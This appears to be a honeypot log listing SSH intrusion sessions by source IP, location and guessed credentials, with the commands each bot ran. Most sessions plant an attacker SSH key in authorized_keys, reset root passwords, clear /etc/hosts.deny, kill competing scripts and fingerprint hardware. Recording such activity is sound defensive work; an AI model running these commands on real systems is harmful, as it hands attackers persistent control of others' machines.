file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:YyD6p72APH6n"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:ifGKj3DmUQJ6"|chpasswd|bash
$ echo "root:Wv3gCxGy9j6V"|chpasswd|bash
🎭 eagle_root_57 (49.51.241.240) β€” Santa Clara, United States Β· 4 sessions Β· 76 cmds
2026-05-16 22:30 EDT Β· as root/cmb, root/control, root/qazwsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:wRAoyfH1Upsc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:OfFLet1wnCep"|chpasswd|bash
$ echo "root:FECIxAYdwSDP"|chpasswd|bash
$ echo "root:F3vvBmMrE69c"|chpasswd|bash
🎭 liberty_root_45 (198.23.150.42) β€” Buffalo, United States Β· 4 sessions Β· 76 cmds
2026-05-16 22:27 EDT Β· as root/cmb, root/control, root/dilbert
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:Z92QbujRtnil"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:mxYOp1DI5oe4"|chpasswd|bash
$ echo "root:QmtOM0Nu6b19"|chpasswd|bash
$ echo "root:EFUfnJ3JjLma"|chpasswd|bash
🎭 star_root_43 (43.135.164.198) β€” Santa Clara, United States Β· 3 sessions Β· 57 cmds
2026-05-16 22:28 EDT Β· as root/control, root/dilbert, root/qazwsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:kD2sHxhxukLK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:27IAfZO9n21G"|chpasswd|bash
$ echo "root:McaaFdzKyr8p"|chpasswd|bash
🎭 burger_root_58 (43.130.28.8) β€” Santa Clara, United States Β· 4 sessions Β· 76 cmds
2026-05-16 22:28 EDT Β· as root/cmb, root/dilbert, root/qazwsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:ydxEIWZhyllI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:3I6j1m5p1FeE"|chpasswd|bash
$ echo "root:LApFNpkIgIgC"|chpasswd|bash
$ echo "root:JMqL49J9hrsx"|chpasswd|bash
🎭 specter_root_22 (201.149.53.243) β€” Miguel Hidalgo, Mexico Β· 3 sessions Β· 58 cmds
2026-05-05 05:21 EDT Β· as root/Server2023!, root/whathefuck, user/aa123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:Ceh30X6nTWBL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:LRZiMxrAd6vV"|chpasswd|bash
$ echo -e "aa123456\niqGEZOIiL1QD\niqGEZOIiL1QD"|passwd|bash
$ Enter new UNIX password:
$ echo "aa123456\niqGEZOIiL1QD\niqGEZOIiL1QD\n"|passwd
🎭 liberty_root_46 (43.135.182.66) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-16 22:29 EDT Β· as root/Server2023!, root/whathefuck
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:E9zaQSqi52GS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:7ExxeJubbtdE"|chpasswd|bash
🎭 wraith_root_89 (103.166.103.173) β€” Multan, Pakistan Β· 1 session Β· 2 cmds
2026-05-16 21:13 EDT Β· as root/Asdfghjkl1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tsar_root (188.43.214.29) β€” Vladivostok, Russia Β· 2 sessions Β· 4 cmds
2026-05-15 16:57 EDT Β· as linux/linux123, root/aq1sw2
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 specter_root_94 (88.147.30.59) β€” Piazza, Italy Β· 1 session Β· 2 cmds
2026-05-16 20:29 EDT Β· as root/aq1sw2
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 shadow_root_87 (14.248.83.33) β€” Hanoi, Vietnam Β· 1 session Β· 19 cmds
2026-05-16 20:24 EDT Β· as root/aq1sw2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:DFJphF1Os5px"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bike_sol_2 (176.65.132.156) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-06 19:48 EDT Β· as admin/admin123, centos/centos
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 phantom_root_102 (223.197.186.7) β€” Central, Hong Kong Β· 4 sessions Β· 8 cmds
2026-05-16 18:30 EDT Β· as root/20192019, root/2069, root/Password123321
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 panda_root_36 (118.145.144.95) β€” Haidian, China Β· 3 sessions Β· 40 cmds
2026-05-16 18:33 EDT Β· as root/20192019, root/2069, root/kiran@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:L7Ks5z9PGBlL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:6dqnc8uk96Lu"|chpasswd|bash
🎭 silk_root_24 (180.110.149.157) β€” Nanjing, China Β· 1 session Β· 19 cmds
2026-05-16 18:37 EDT Β· as root/2069
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:D10ALowjZ5t3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_53 (69.169.109.96) β€” Secaucus, United States Β· 1 session Β· 2 cmds
2026-05-16 18:28 EDT Β· as root/Password123321
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 monsoon_root_20 (45.123.217.22) β€” Kolkata, India Β· 1 session Β· 2 cmds
2026-05-16 18:28 EDT Β· as root/123456q
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
